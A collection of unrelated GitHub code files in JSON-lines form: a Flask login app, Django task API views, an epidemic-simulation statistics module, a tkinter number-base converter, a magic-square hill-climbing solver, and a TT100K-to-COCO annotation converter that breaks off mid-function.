+{"seq_id":"10470704141","text":"from flask import Flask, jsonify, request, make_response, render_template\nfrom flask import render_template, redirect, url_for, flash\nfrom flask_login import UserMixin, LoginManager\nfrom flask_login import login_user, login_required, current_user, logout_user\nfrom flask_login import login_required, current_user # After login - Profile\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_socketio import SocketIO, send, emit\nfrom flask_cors import CORS\n\n\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\nfrom datetime import datetime\n\napp = Flask(__name__)\nCORS(app)\napp.config['SECRET_KEY'] = 'secret-key-goes-here'\nsocketio = SocketIO(app)\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///AirCADia_Nebos.db'\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login'\nlogin_manager.init_app(app)\n\n@login_manager.user_loader\ndef load_user(user_id):\n # since the user_id is just the primary key of our user table, use it in the query for the user\n return User.query.get(int(user_id))\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/aircadia_nebos')\n@login_required\ndef aircadia_nebos():\n return render_template('AircadiaNebos/AirCADiaNebos.html')\n\n@app.route('/profile')\n@login_required\ndef profile():\n return render_template('profile.html', name=current_user.name)\n\n\n@app.route('/aircadia')\ndef aaa():\n return \"Hello, AirCADia!\"\n\n\n@app.route('/signup')\ndef signup():\n return render_template('signup.html')\n\n@app.route('/signup', methods=['POST'])\ndef signup_post():\n # code to validate and add user to database goes here\n email = request.form.get('email')\n username = request.form.get('email')\n name = request.form.get('name')\n password = request.form.get('password')\n\n user = User.query.filter_by(email=email).first() # if this returns a user, then the email already exists in database\n\n if user: # if a user is found, we want to redirect back to signup page so user can try again\n flash('Email address already exists')\n return redirect(url_for('signup'))\n\n # create a new user with the form data. Hash the password so the plaintext version isn't saved.\n new_user = User(name=name, email=email, username=username, password=generate_password_hash(password, method='sha256'))\n\n # add the new user to the database\n db.session.add(new_user)\n db.session.commit()\n return redirect(url_for('login'))\n\n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n@app.route('/login', methods=['POST'])\ndef login_post():\n # login code goes here\n email = request.form.get('email')\n password = request.form.get('password')\n remember = True if request.form.get('remember') else False\n\n user = User.query.filter_by(email=email).first()\n\n # check if the user actually exists\n # take the user-supplied password, hash it, and compare it to the hashed password in the database\n if not user or not check_password_hash(user.password, password):\n flash('Please check your login details and try again.')\n return redirect(url_for('login')) # if the user doesn't exist or password is wrong, reload the page\n\n # if the above check passes, then we know the user has the right credentials\n login_user(user, remember=remember)\n return redirect(url_for('profile'))\n\n\n\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return 'Logout'\n\n\n\n\n\n@app.route('/get-projects', methods=[\"GET\"])\ndef get_projects():\n projectsJson = []\n # projects\n projects = Project.query.all()\n for project in projects:\n projectJson = {\n \"name\": project.name,\n \"end_point\": project.end_point\n }\n projectsJson.append(projectJson)\n res = make_response(jsonify(projectsJson), 200)\n return res\n\n\n# Table for storing users\nclass User(UserMixin, db.Model):\n __tablename__ = 'Users'\n id = db.Column(\"ID\", db.Integer, primary_key = True)\n name = db.Column(\"Name\", db.String(50))\n email = db.Column(\"Email\", db.String(50), unique=True)\n #location = db.Column(db.String(50))\n #date_created = db.Column(db.DateTime, dafault = datetime.now)\n username = db.Column(\"Username\", db.String(50), unique=True)\n password = db.Column(\"Password\", db.String(50))\n projects = db.relationship(\"Project\", secondary=\"UsersProjects\")\n\n \n\n\n\n# Table for storing projects\nclass Project(db.Model):\n __tablename__ = 'Projects'\n id = db.Column(\"ID\", db.Integer, primary_key = True)\n name = db.Column(\"Name\", db.String(50))\n end_point = db.Column(\"EndPoint\", db.String(50))\n #value = db.Column(db.String(50))\n #date_created = db.Column(db.DateTime, dafault = datetime.now)\n\n\n# Table for storing users-projects\nclass UserProject(db.Model):\n __tablename__ = 'UsersProjects'\n id = db.Column(\"ID\", db.Integer, primary_key=True)\n user_id = db.Column(\"UserID\", db.Integer, db.ForeignKey('Users.ID'))\n project_id = db.Column(\"ProjectID\", db.Integer, db.ForeignKey('Projects.ID'))\n user = db.relationship(User, backref=db.backref(\"UsersProjects\", cascade=\"all, delete-orphan\"))\n project = db.relationship(Project, backref=db.backref(\"UsersProjects\", cascade=\"all, delete-orphan\"))\n\n\n\n\n\n\n#Events\n@socketio.on('message')\ndef handle_message(msg):\n print('get message:'+ msg)\n send(msg, broadcast=True)\n\n\n@socketio.on('create_data')\ndef handle_create_data(json):\n print('received json: ' + str(json))\n emit('create_data', json, broadcast=True)\n\n@socketio.on('create_model')\ndef handle_create_model(json):\n print('received json: ' + str(json))\n emit('create_model', json, broadcast=True)\n\n\n@socketio.on('create_workflow')\ndef handle_create_workflow(json):\n print('received json: ' + str(json))\n emit('create_workflow', json, broadcast=True)\n\n\n\nif __name__ == '__main__':\n socketio.run(app, debug=True, port=3001)","repo_name":"Atif-Aerospace/AirCADiaNebosDatabase","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"395190592","text":"from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Task\nfrom .serializers import TaskSerializer\nfrom django.shortcuts import get_object_or_404\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_task_list(request):\n tasks = Task.objects.filter(owner=request.user)\n serializer = TaskSerializer(tasks, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_task_detail(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n serializer = TaskSerializer(task)\n return Response(serializer.data)\n\n@api_view(['POST'])\n# @permission_classes([IsAuthenticated])\ndef create_task(request):\n serializer = TaskSerializer(data=request.data)\n if serializer.is_valid():\n serializer.validated_data['owner'] = request.user\n serializer.validated_data['completed'] = False\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=400)\n\n@api_view(['PATCH'])\n@permission_classes([IsAuthenticated])\ndef edit_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n serializer = TaskSerializer(task, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=400)\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef delete_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n task.delete()\n return Response(status=204)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef execute_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n task.completed = True\n task.save()\n return Response({\"message\": \"Task marked as completed\"})\n","repo_name":"adaltair/decodeproject","sub_path":"src/todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13670577312","text":"\"\"\"\n03/08/2020\n\nGroup 4: Majed Almazrouei, Justin Becker, Dylan Conway, Kyle Diodati, Nicholas Fay\n\nThis module is in charge of collecting and producing statistics on the simulation and the data it collected from\nthe contagions influence on the population.\n\"\"\"\n\nimport os\nimport sys\n\nimport lib.city\nimport lib.person\nimport lib.vessel\n\n\nclass statistics:\n\n def __init__(self):\n \"\"\"\n self, None -> None\n This function has the purpose of initializing the statistics module. \n This module keeps track of all statistical calculations/displays that the program makes.\n \"\"\"\n self.cities = list() #list of all the cities in the simulation\n self.activevessels = list() # list of flights that are ready to leave\n self.inactivevessels = list() # list of flights not ready to leave\n #number of dead, immune, infected and healthy individuals\n self.dead = 0\n self.immune = 0\n self.inf = 0\n self.healthy = 0\n\n self.Re = 100\n self.totalPop = 0\n\n def add_vessels(self, newVessels):\n \"\"\"\n self, list(new vessels) -> None\n This function adds new vessels to the active planes we can track.\n \"\"\"\n self.activevessels += newVessels\n return\n\n def add_city(self, newcity):\n \"\"\"\n self, city (city object) -> None\n This function adds cities to the statistics cities list.\n \"\"\"\n self.cities.append(newcity)\n # Add to the total population.\n self.totalPop += len(newcity.people)\n return \n\n def curr_contagion_info(self, hour, run_time):\n \"\"\"\n self, int (hour), int (run time) -> None\n This function has a purpose of printing the current information of the contagions impact \n on the population for that specific day: hour. This function is solely used for printing to console\n to visually show the trends in the contagion contamination.\n \"\"\"\n\n #print header day and hour values\n formated_completon_perc = str((hour/run_time) * 100)\n formated_completon_perc = formated_completon_perc[:5]\n print(\"\\033[0;0H\", end=\"\")\n print(\"\\rSimulation Completion at {}%\\n\".format(formated_completon_perc), end=\"\\n\")\n print(\"\\r\\33[1mDay {}\\tHour {}:\".format(int(hour/24), hour), end=\"\\n\")\n #iterate through all the cities and get the total counts for contagion information\n for location in self.cities:\n inf = location.inf_count\n hlth = location.healthy_count\n immu = location.immune_count\n dead = location.dead_count\n #print the information to the console\n print(\"\\r \\033[K\", end=\"\") # Fixes healthy having character duplicates\n print(\"\\r \\33[1m {}\\33[0m:\\t\\t\\33[32m{} Healthy\\33[0m\\t {} Immune\\t\\33[93m{} Infected \\33[0m\\t\\33[31m {} Dead \\33[0m\".format(location.name, hlth, immu, inf, dead), end=\"\\n\")\n \n print(\"\\r\\nEffective Reproduction Number: {}\".format(self.Re), end=\"\\n\")\n\n print(\"\\r\\nPress CTRL^C to exit the simulation early.\")\n return \n \n def get_total_counts(self):\n \"\"\"\n self, None -> None\n This function is responsible for getting the total amount of the given attribute (inf, dead etc) people \n from each city to report statistics.\n \"\"\"\n for city in self.cities: #iterate through all the cities\n self.healthy += city.healthy_count\n self.dead += city.dead_count\n self.immune += city.immune_count\n self.inf += city.inf_count\n \n # Get counts for people still in flight when the program finishes.\n for flight in self.activevessels:\n for person in flight.people:\n if person.immune:\n self.immune += 1\n elif person.dead:\n self.dead += 1\n elif person.infected:\n self.inf += 1\n else:\n self.healthy += 1\n return\n\n def get_percentage(self, count, init_population):\n \"\"\"\n self, int (count of people), int (healthy person count) -> float\n This function is in charge of calculating the percentage of individuals that \n die, get infected or become immune compared to the overall population.\n \"\"\"\n #try to calculate percentage\n try:\n return ((count/init_population) * 100)\n except ZeroDivisionError:\n #if there is a division by zero error for some reason\n return 0\n\n def print_time_series_table(self, days, immune, infected, dead):\n \"\"\"\n self, list, list, list, list -> None\n This function is in charge of printing a table that shows all the time series data\n that has been collected. This will be exececuted at the end of the program.\n \"\"\"\n #dict for labels and rows\n table = [days, infected, immune, dead]\n #list of all header labels\n headers = [\"Days\", \"Infected\", \"Immune\", \"Dead\"]\n for item in headers:\n print(\"\\33[1m{:>10}\\33[0m\".format(item).strip(\"\\n\"), end=\"\")\n print(\"\")\n #iterate through table keys\n i = 0\n while(i<len(days)):\n for row in table:\n #print the necessary item in the index given by i\n print(\"{: >10}\".format(row[i]).strip(\"\\n\"), end=\"\")\n #print a new line for the next day\n print(\"\")\n i += 1\n return\n\n def average_stats(self, days, attribute):\n \"\"\"\n self, int (days), int (attribute) -> float\n This function has a purpose of determining the average number of\n individuals that die, immune or are infected each day. \n \"\"\"\n return attribute/days\n\n def print_stats(self, days, initial_pop):\n \"\"\"\n self, int (days the simulation ran for), int (initial population) -> None\n This function has the sole function of printing all final statistics after\n the execution of the main program.\n \"\"\"\n #get the total counts of infected, dead, immune and healthy individuals\n self.get_total_counts()\n #get the percentage of those dead, immune and infected\n dead_perc = self.get_percentage(self.dead, initial_pop)\n immune_perc = self.get_percentage(self.immune, initial_pop)\n inf_perc = self.get_percentage(self.inf, initial_pop)\n healthy_perc = self.get_percentage(self.healthy, initial_pop)\n average_deaths = self.average_stats(days,self.dead)\n average_infected = self.average_stats(days, self.inf)\n average_immune = self.average_stats(days, self.immune)\n #print the total counts after the amount of time the simulation has run\n print(\"\\n\\nAfter {} days, these are the results of the contagions impact on the population with {} individuals.\".format(days, initial_pop))\n print(\"\\33[1mTotal Counts ---->\\33[0m\\33[32m Healthy: {},\\33[0m\\33[93m Infected: {},\\33[0m \\33[31mDead: {},\\33[0m Immune: {}\".format(self.healthy, self.inf, self.dead, self.immune))\n print(\"Each day on average: \\33[93m{} people are infected\\33[0m, \\33[31m{} die\\33[0m and {} become immune.\".format(average_infected, average_deaths, average_immune))\n #print the total amount of healthy people, dead, infected and immune\n print(\"Out of the {} people in the total population.\".format(initial_pop))\n print(\"{}% are \\33[31mdead.\\33[0m\".format(dead_perc))\n print(\"{}% are immune.\".format(immune_perc))\n print(\"{}% were \\33[93minfected.\\33[0m\".format(inf_perc))\n print(\"{}% are still \\33[32mhealthy.\\33[0m\".format(healthy_perc))\n return\n","repo_name":"kdiodati/Epidemic-Simulator","sub_path":"lib/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27048950868","text":"\n# Write Python GUI program to accept a decimal number and convert and display it to binary, octal and hexadecimal number.\nfrom tkinter import *\ndef calculate():\n res=int(e1.get())\n label_text.set(bin(res))\n label_text1.set(oct(res))\n label_text2.set(hex(res))\n \nwindow=Tk()\nlabel_text=StringVar()\nlabel_text1=StringVar()\nlabel_text2=StringVar()\nLabel(window,text=\"Enter Decimal Number: \").grid(row=0)\n\n\nLabel(window,text=\"Binary: \").grid(row=3)\nresult=Label(window,text=\"\",textvariable=label_text).grid(row=3,column=1)\n\nLabel(window,text=\"Octal\").grid(row=4)\nresult=Label(window,text=\"\",textvariable=label_text1).grid(row=4,column=1)\n\nLabel(window,text=\"Hexadecimal: \").grid(row=5)\nresult=Label(window,text=\"\",textvariable=label_text2).grid(row=5,column=1)\ne1=Entry(window)\ne1.grid(row=0,column=1)\nb=Button(window,text=\"Calculate\",command=calculate)\nb.grid(row=0,column=6,columnspan=2,rowspan=2,padx=5,pady=5)\nmainloop()\n\n","repo_name":"khankabi/TY-BCA_Samir","sub_path":"PRACTICAL SLIPS SOLUTION/Slip 27/python/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10448113425","text":"from itertools import combinations\nfrom random import shuffle\n\nfrom simpleai.search import SearchProblem, hill_climbing\n\nfrom utils import print_grid\n\n\nSQUARE_SIZE = 10\nMAX_NUMBER = SQUARE_SIZE ** 2\n\nTARGET_TOTAL = sum(range(1, MAX_NUMBER+1)) / SQUARE_SIZE\n\n\ndef find(element, state):\n for row_i, row in enumerate(state):\n for column_i, this_element in enumerate(row):\n if element == this_element:\n return row_i, column_i\n\n\nclass MagicSquareProblem(SearchProblem):\n def actions(self, state):\n return list(combinations(range(1, MAX_NUMBER +1), 2))\n\n def result(self, state, action):\n state = [list(row) for row in state]\n number_a, number_b = action\n\n a_row, a_column = find(number_a, state)\n b_row, b_column = find(number_b, state)\n\n state[a_row][a_column] = number_b\n state[b_row][b_column] = number_a\n\n return tuple(tuple(row) for row in state)\n\n def value(self, state):\n totals = []\n for row in state:\n totals.append(sum(row))\n\n for column in zip(*state):\n totals.append(sum(column))\n\n return totals.count(TARGET_TOTAL)\n\n def generate_random_state(self):\n numbers = list(range(1, MAX_NUMBER + 1))\n shuffle(numbers)\n\n state = []\n for row_index in range(SQUARE_SIZE):\n from_index = row_index * SQUARE_SIZE\n to_index = from_index + SQUARE_SIZE\n state.append(tuple(numbers[from_index:to_index]))\n\n return tuple(state)\n\n def print_state(self, state):\n elements = {\n str(element): [(row_i, column_i)]\n for row_i, row in enumerate(state)\n for column_i, element in enumerate(row)\n }\n\n print_grid(SQUARE_SIZE, SQUARE_SIZE, elements)\n\n\nif __name__ == \"__main__\":\n expected_value = SQUARE_SIZE * 2\n iterations = 0\n while True:\n iterations += 1\n random_state = MagicSquareProblem().generate_random_state()\n problem = MagicSquareProblem(random_state)\n result = hill_climbing(problem, 1000)\n if result.value == expected_value:\n print(\"solution found! Iterations:\", iterations)\n break\n if iterations % 10 == 0:\n print(f\"{iterations} iterations and the solution hasn't been found yet :(\")\n\n\n problem.print_state(result.state)\n print(\"value:\", problem.value(result.state))\n","repo_name":"sofide/ai-practices","sub_path":"magic_squares.py","file_name":"magic_squares.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12089360442","text":"import os\nimport json\nfrom random import random\nimport cv2\nimport shutil\nimport json\nimport xml.dom.minidom\nfrom tqdm import tqdm\nimport argparse\n\n\n# from jinxSkills.jinx_opencv.datasets_transform.dataset_transform import DataSets_transform\n\n\nclass TT100K2COCO:\n def __init__(self):\n self.original_datasets = 'tt100k'\n self.to_datasets = 'coco'\n\n def class_statistics(self):\n # os.makedirs('annotations', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations_all.json')) as origin_json:\n origin_dict = json.load(origin_json)\n classes = origin_dict['types']\n # 建立统计每个类别包含的图片的字典\n sta = {}\n for i in classes:\n sta[i] = []\n\n images_dic = origin_dict['imgs']\n\n # 记录所有保留的图片\n saved_images = []\n # 遍历TT100K的imgs\n for image_id in images_dic:\n image_element = images_dic[image_id]\n image_path = image_element['path']\n\n # 添加图像的信息到dataset中\n image_path = image_path.split('/')[-1]\n obj_list = image_element['objects']\n\n # 遍历每张图片的标注信息\n for anno_dic in obj_list:\n label_key = anno_dic['category']\n # 防止一个图片多次加入一个标签类别\n if image_path not in sta[label_key]:\n sta[label_key].append(image_path)\n\n # 只保留包含图片数超过100的类别(重新划分,阈值100可根据需求修改)\n result = {k: v for k, v in sta.items() if len(v) >= 100}\n\n for i in result:\n print(\"the type of {} includes {} images\".format(i, len(result[i])))\n saved_images.extend(result[i])\n\n saved_images = list(set(saved_images))\n print(\"total types is {}\".format(len(result)))\n\n type_list = list(result.keys())\n result = {\"type\": type_list, \"details\": result, \"images\": saved_images}\n print(type_list)\n # 保存结果\n json_name = os.path.join(parent_path, 'statistics.json')\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n json.dump(result, f, ensure_ascii=False, indent=1)\n\n def original_datasets2object_datasets(self):\n # os.makedirs('dataset/annotations', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021/data'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations.json')) as origin_json:\n origin_dict = json.load(origin_json)\n\n with open(os.path.join(parent_path, 'statistics.json')) as select_json:\n select_dict = json.load(select_json)\n classes = select_dict['type']\n\n train_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n val_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n test_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n label = {}\n\n info = {\n \"year\": 2021, # 年份\n \"version\": '1.0', # 版本\n \"description\": \"TT100k_to_coco\", # 数据集描述\n \"contributor\": \"Tecent&Tsinghua\", # 提供者\n \"url\": 'https://cg.cs.tsinghua.edu.cn/traffic-sign/', # 下载地址\n \"date_created\": 2021 - 1 - 15\n }\n licenses = {\n \"id\": 1,\n \"name\": \"null\",\n \"url\": \"null\",\n }\n\n train_dataset['info'] = info\n val_dataset['info'] = info\n test_dataset['info'] = info\n train_dataset['licenses'] = licenses\n val_dataset['licenses'] = licenses\n test_dataset['licenses'] = licenses\n\n # 建立类别和id的关系\n for i, cls in enumerate(classes):\n train_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n val_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n test_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n label[cls] = i\n\n images_dic = origin_dict['imgs']\n\n obj_id = 1\n\n # TT100K的annotation转换成coco的\n for image_id in images_dic:\n image_element = images_dic[image_id]\n image_path = image_element['path']\n\n # 用opencv读取图片,得到图像的宽和高\n im = cv2.imread(os.path.join(parent_path, image_path))\n H, W, _ = im.shape\n\n # 切换dataset的引用对象,从而划分数据集\n if 'train' in image_path:\n dataset = train_dataset\n elif 'test' in image_path:\n dataset = val_dataset\n else:\n dataset = test_dataset\n\n # 添加图像的信息到dataset中\n image_path = image_path.split('/')[-1]\n dataset['images'].append({'file_name': image_path,\n 'id': image_id,\n 'width': W,\n 'height': H})\n obj_list = image_element['objects']\n\n for anno_dic in obj_list:\n x = anno_dic['bbox']['xmin']\n y = anno_dic['bbox']['ymin']\n width = anno_dic['bbox']['xmax'] - anno_dic['bbox']['xmin']\n height = anno_dic['bbox']['ymax'] - anno_dic['bbox']['ymin']\n label_key = anno_dic['category']\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x, y, width, height],\n 'category_id': label[label_key],\n 'id': obj_id,\n 'image_id': image_id,\n 'iscrowd': 0,\n # mask, 矩形是从左上角点按顺时针的四个顶点\n 'segmentation': [[x, y, x + width, y, x + width, y + height, x, y + height]]\n })\n # 每个标注的对象id唯一\n obj_id += 1\n\n # 保存结果\n for phase in ['train', 'val', 'test']:\n json_name = os.path.join(parent_path, 'annotations/{}.json'.format(phase))\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n if phase == 'train':\n json.dump(train_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'val':\n json.dump(val_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'test':\n json.dump(test_dataset, f, ensure_ascii=False, indent=1)\n\n def original_datasets2object_datasets_re(self):\n '''\n 重新划分数据集\n :return:\n '''\n # os.makedirs('annotations2', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations.json')) as origin_json:\n origin_dict = json.load(origin_json)\n\n with open(os.path.join(parent_path, 'statistics.json')) as select_json:\n select_dict = json.load(select_json)\n classes = select_dict['type']\n\n train_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n val_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n test_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n label = {} # 记录每个标志类别的id\n count = {} # 记录每个类别的图片数\n owntype_sum = {}\n\n info = {\n \"year\": 2021, # 年份\n \"version\": '1.0', # 版本\n \"description\": \"TT100k_to_coco\", # 数据集描述\n \"contributor\": \"Tecent&Tsinghua\", # 提供者\n \"url\": 'https://cg.cs.tsinghua.edu.cn/traffic-sign/', # 下载地址\n \"date_created\": 2021 - 1 - 15\n }\n licenses = {\n \"id\": 1,\n \"name\": \"null\",\n \"url\": \"null\",\n }\n\n train_dataset['info'] = info\n val_dataset['info'] = info\n test_dataset['info'] = info\n train_dataset['licenses'] = licenses\n val_dataset['licenses'] = licenses\n test_dataset['licenses'] = licenses\n\n # 建立类别和id的关系\n for i, cls in enumerate(classes):\n train_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n val_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n test_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n label[cls] = i\n count[cls] = 0\n owntype_sum[cls] = 0\n\n images_dic = origin_dict['imgs']\n\n obj_id = 1\n\n # 计算出每个类别共‘包含’的图片数\n for image_id in images_dic:\n\n image_element = images_dic[image_id]\n image_path = image_element['path']\n image_name = image_path.split('/')[-1]\n # 在所选的类别图片中\n if image_name not in select_dict['images']:\n continue\n\n # 处理TT100K中的标注信息\n obj_list = image_element['objects']\n # 记录图片中包含最多的实例所属的type\n includes_type = {}\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n # print(anno_dic[\"category\"])\n if anno_dic[\"category\"] in includes_type:\n includes_type[anno_dic[\"category\"]] += 1\n else:\n includes_type[anno_dic[\"category\"]] = 1\n # print(includes_type)\n own_type = max(includes_type, key=includes_type.get)\n owntype_sum[own_type] += 1\n\n # TT100K的annotation转换成coco的\n for image_id in images_dic:\n\n image_element = images_dic[image_id]\n image_path = image_element['path']\n image_name = image_path.split('/')[-1]\n # 在所选的类别图片中\n if image_name not in select_dict['images']:\n continue\n print(\"dealing with {} image\".format(image_path))\n # shutil.copy(os.path.join(parent_path,image_path),os.path.join(parent_path,\"dataset/JPEGImages\"))\n\n # 处理TT100K中的标注信息\n obj_list = image_element['objects']\n # 记录图片中包含最多的实例所属的type\n includes_type = {}\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n # print(anno_dic[\"category\"])\n if anno_dic[\"category\"] in includes_type:\n includes_type[anno_dic[\"category\"]] += 1\n else:\n includes_type[anno_dic[\"category\"]] = 1\n # print(includes_type)\n own_type = max(includes_type, key=includes_type.get)\n count[own_type] += 1\n num_rate = count[own_type] / owntype_sum[own_type]\n\n # 切换dataset的引用对象,从而划分数据集根据每个类别类别的总数量按7:2:1分为了train_set,val_set,test_set。\n # 其中每个图片所属类别根据该图片包含的类别的数量决定(归属为含有类别最多的类别)\n if num_rate < 0.7:\n dataset = train_dataset\n elif num_rate < 0.9:\n dataset = val_dataset\n else:\n print(\"dataset=test_dataset\")\n dataset = test_dataset\n\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n x = anno_dic['bbox']['xmin']\n y = anno_dic['bbox']['ymin']\n width = anno_dic['bbox']['xmax'] - anno_dic['bbox']['xmin']\n height = anno_dic['bbox']['ymax'] - anno_dic['bbox']['ymin']\n label_key = anno_dic['category']\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x, y, width, height],\n 'category_id': label[label_key],\n 'id': obj_id,\n 'image_id': image_id,\n 'iscrowd': 0,\n # mask, 矩形是从左上角点按顺时针的四个顶点\n 'segmentation': [[x, y, x + width, y, x + width, y + height, x, y + height]]\n })\n # 每个标注的对象id唯一\n obj_id += 1\n\n # 用opencv读取图片,得到图像的宽和高\n im = cv2.imread(os.path.join(parent_path, image_path))\n # print(image_path)\n H, W, _ = im.shape\n # 添加图像的信息到dataset中\n dataset['images'].append({'file_name': image_name,\n 'id': image_id,\n 'width': W,\n 'height': H})\n\n # 保存结果\n for phase in ['train', 'val', 'test']:\n json_name = os.path.join(parent_path, 'data/dataset/annotations/{}.json'.format(phase))\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n if phase == 'train':\n json.dump(train_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'val':\n json.dump(val_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'test':\n json.dump(test_dataset, f, ensure_ascii=False, indent=1)\n\n def json2xml(self):\n img_path = 'E:/dataset/tt100k_2021/data/train/' # train图片路径\n annos = json.loads(open(\"E:/dataset/tt100k_2021/data/annotations.json\").read())\n xml_path = 'E:/dataset/tt100k_2021data/xml_train/' # xml保存路径\n\n for line in open(img_path + \"ids.txt\"):\n img_name = line.replace('\\n', '')\n img_file = img_name + '.jpg'\n img = cv2.imread(img_path + img_file)\n sp = img.shape\n img_height = str(sp[0]) # height(rows) of image\n img_width = str(sp[1])\n\n doc = xml.dom.minidom.Document()\n # creat a root node which name is annotation\n annotation = doc.createElement('annotation')\n # add the root node to the dom document object\n doc.appendChild(annotation)\n\n # add the folder subnode\n folder = doc.createElement('folder')\n folder_text = doc.createTextNode('JPEGImages')\n folder.appendChild(folder_text)\n annotation.appendChild(folder)\n\n # add the filename subnode\n filename = doc.createElement('filename')\n filename_text = doc.createTextNode(img_file)\n filename.appendChild(filename_text)\n annotation.appendChild(filename)\n\n # add the path subnode\n path = doc.createElement('path')\n path_text = doc.createTextNode(\n img_path + img_file)\n path.appendChild(path_text)\n annotation.appendChild(path)\n\n # add the source subnode\n source = doc.createElement('source')\n database = doc.createElement('database')\n database_text = doc.createTextNode('Unknown')\n source.appendChild(database)\n database.appendChild(database_text)\n annotation.appendChild(source)\n\n # add the size subnode\n size = doc.createElement('size')\n width = doc.createElement('width')\n width_text = doc.createTextNode(img_width)\n height = doc.createElement('height')\n height_text = doc.createTextNode(img_height)\n depth = doc.createElement('depth')\n depth_text = doc.createTextNode('3')\n size.appendChild(width)\n width.appendChild(width_text)\n size.appendChild(height)\n height.appendChild(height_text)\n size.appendChild(depth)\n depth.appendChild(depth_text)\n annotation.appendChild(size)\n\n segmented = doc.createElement('segmented')\n segmented_text = doc.createTextNode('0')\n segmented.appendChild(segmented_text)\n annotation.appendChild(segmented)\n\n img_objects = annos[\"imgs\"][img_name]['objects']\n for i in range(0, len(img_objects)):\n obj_category = annos[\"imgs\"][img_name]['objects'][i]['category']\n obj_bbox = annos[\"imgs\"][img_name]['objects'][i]['bbox']\n bbox_ymin = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['ymin'])\n bbox_xmin = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['xmin'])\n bbox_ymax = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['ymax'])\n bbox_xmax = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['xmax'])\n print(obj_category, bbox_ymin, bbox_xmin, bbox_ymax, bbox_xmax)\n\n object = doc.createElement('object')\n name = doc.createElement('name')\n name_text = doc.createTextNode(obj_category)\n difficult = doc.createElement('difficult')\n difficult_text = doc.createTextNode('0')\n pose = doc.createElement('pose')\n pose_text = doc.createTextNode('Unspecified')\n truncated = doc.createElement('truncated')\n truncated_text = doc.createTextNode('0')\n bndbox = doc.createElement('bndbox')\n xmin = doc.createElement('xmin')\n xmin_text = doc.createTextNode(str(bbox_xmin))\n 